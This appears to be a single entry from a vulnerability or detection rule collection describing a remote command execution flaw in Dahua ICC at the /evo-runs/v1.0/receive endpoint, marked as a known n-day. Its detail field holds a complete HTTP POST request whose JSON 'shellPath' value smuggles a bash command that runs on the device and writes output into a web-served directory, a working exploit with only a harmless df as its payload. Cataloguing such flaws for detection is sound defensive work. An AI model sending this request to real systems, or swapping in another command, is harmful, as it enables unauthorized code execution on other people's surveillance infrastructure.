vendor = "大华"
name = "大华icc /evo-runs/v1.0/receive RCE"
type = "RCE"
version = "未知"
path = "/evo-runs/v1.0/receive"
detail = "POST /evo-runs/v1.0/receive HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip Connection: keep-alive Content-Length: 249 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 X-Subject-Headerflag: ADAPT { \"method\": \"agent.ossm.mapping.config\", \"info\": { \"configure\": \"abcd\", \"filePath\": \"haha\", \"paramMap\": { \"shellPath\": \"/bin/bash -c df>/opt/evoWpms/static/macvguun.txt\", \"filePath\": \"abc\" }, \"requestIp\": \"\" } }"
fix = "缺省规则可检出"
date = "0711"
label = "nday"
verifier = "AdySec"
